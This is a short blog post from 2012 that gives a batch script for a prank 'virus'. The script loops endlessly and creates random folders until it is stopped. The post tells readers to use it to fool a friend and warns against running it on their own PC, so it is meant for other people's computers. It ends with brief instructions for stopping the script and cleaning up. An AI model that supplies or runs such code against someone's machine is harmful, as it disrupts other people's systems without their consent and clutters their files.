Hello friends, I have written a mini book on Cyber Security awareness for you, named "Hacking into Hackers' Head". This book uses common terms to explain things, and I'm sure you will get benefitted from it in your day to day life. It's available on Kindle and Google Play. Grab your copy now.

Monday, April 9, 2012

Virus that floods desktop with folders

Hi TTH readers, today I am going to make a virus in notepad that floods your PC desktop with unlimited number of folders.

You can use this trick to fool you friend.

Follow these steps:

1. Open Notepad and copy paste the following code in it.



@echo off
:l
md %random%
goto l


2. Save it on desktop with "flood.bat" or "anything.bat".
3. Double click on this batch file to see its effect.


NOTE: Dont apply on your own PC.
 Accidentally, if you have double clicked then no need to worry.
From Task Manager, terminate this program and delete the created folder from the desktop.
One way to delete is, press ctrl + a.
Deselect all your required icons and press Delete.


Enjoy Hacking.
Join, if you liked the post.

No comments:

Post a Comment

We appreciate your valuable comments.

Scroll to Top